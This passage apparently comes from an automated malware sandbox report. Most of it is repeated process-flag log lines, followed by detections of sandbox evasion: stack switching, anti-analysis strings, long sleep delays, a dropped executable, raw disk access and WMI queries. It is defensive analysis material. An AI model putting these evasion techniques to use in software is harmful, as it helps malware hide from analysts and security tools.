                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeAPI/Special instruction interceptor: Address: 7FFB2CECD044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 7FFB2CECD044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 55DB83A
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: 1061714629.exe, 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmp, 1061714629.exe, 0000001F.00000002.1933806524.0000000002489000.00000040.00001000.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1897292641.00000000007B9000.00000040.00000400.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1903619913.00000000007B9000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                      Source: 1061714629.exeBinary or memory string: CFF EXPLORER.EXE
                      Source: 1061714629.exe, 0000001F.00000002.1933122608.0000000000674000.00000040.00000001.01000000.00000010.sdmp, 1061714629.exe, 0000001F.00000002.1933806524.0000000002489000.00000040.00001000.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1897292641.00000000007B9000.00000040.00000400.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1903619913.00000000007B9000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 593045
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592920
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592730
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592602
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592492
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2980Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6867Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6140
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3488
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeDropped PE file which has not been started: C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeAPI coverage: 0.4 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668Thread sleep count: 2980 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7672Thread sleep count: 6867 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 8144Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2092Thread sleep count: 6140 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8568Thread sleep time: -25825441703193356s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8696Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3272Thread sleep count: 3488 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8568Thread sleep time: -593045s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8568Thread sleep time: -592920s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8568Thread sleep time: -592730s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8568Thread sleep time: -592602s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8568Thread sleep time: -592492s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 593045
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592920
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592730
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592602
